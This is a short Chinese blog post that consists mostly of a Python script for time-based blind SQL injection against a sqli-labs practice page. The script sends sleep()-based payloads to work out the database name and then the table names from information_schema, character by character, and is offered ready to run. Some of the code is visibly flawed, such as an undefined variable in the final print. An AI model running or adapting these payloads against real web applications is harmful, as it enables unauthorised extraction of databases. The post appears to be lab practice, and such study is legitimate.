当前位置:网站首页>时间盲注脚本
时间盲注脚本
2022-08-03 05:22:00 【wuqinghalasao】
import requests,time,string # 假设页面无任何回显需要用到时间注入 url='http://192.168.28.133/sqli-labs-master/Less-10/?id=1" and ' a1=0 for a in range(10): start=time.time() res=requests.get(f"{url}if(length(database())={a},sleep(2),1)-- -") response = res.text end=time.time() if end-start>1: a1=a print(f'库名长度为{a1}') break low = 'abcdefghijklmnopqrstuvw,xyz' res1='' for a2 in range(a1+1): for a3 in low: start = time.time() res3 = requests.get(f"{url}if(substr(database(),{a2},1)='{a3}',sleep(2),1)-- - ") response4=res3.text end = time.time() if end-start>1: res1+=a3 print(f'库名为{res1}') # 查表数量,不需要判断表的数量,直接gruop_concat res8=[] # 取表名 res7 = '' for a7 in range(1,60): for a8 in low: start = time.time() res6 = requests.get(f"{url}if(substr((SELECT group_concat(table_name) from information_schema.tables where table_schema='{res1}'),{a7},1)='{a8}',sleep(3),1) ") response6=res6.text end = time.time() if end - start > 2: res7+=a8 res8.append(res7) print(res8) print(f'数据库{res4}有{res8}表')
边栏推荐
- 嵌入式实验四
- `monorepo` 中 `hoist` 机制导致加载配置文件路径的变化
- 中国融资租赁行业市场投资分析与前景战略规划建议报告2022~2028年
- pta a.1030的dijkstra+DFS方法
- 小码农的第一篇博客
- Delightful Nuxt3 Tutorial (1): Application Creation and Configuration
- 【Arduino】关于“&”和“|” 运算-----多个参数运算结果异常的问题解决
- 【按位取反,逻辑操作符,条件操作符,逗号表达式,下标引用,函数调用,结构体】操作符后续+表达式求值(上)
- 理论上的嵌入式跑马灯
- [Rebound shell and privilege escalation]
猜你喜欢
随机推荐
EIP-5058 能否防止NFT项目方提桶跑路?
中国水环境治理行业投融资分析及“十四五”规划建议报告2022~2028年
关于如何向FastAPI的依赖函数添加参数
嵌入式实验二注意点
Qlik Sense 赋值详解(Set、Let)
磁盘空间管理
动态调整web系统主题? 看这一篇就够了
中国柔性制造系统(FMS)市场发展动态及未来趋势预测报告2022~2028年
联邦学习摘录
用C语言来实现五子棋小游戏
该描述怎么写成SQL语句
7.16(6)
【DC-4靶场渗透】
uni-app 滚动到顶部/指定位置
下拉框数据字典应用案例
Flask,3-6
理论上的嵌入式跑马灯
Router-view
【DC-4 Range Penetration】
[CSRF, SSRF, XXE, PHP deserialization, Burpsuite]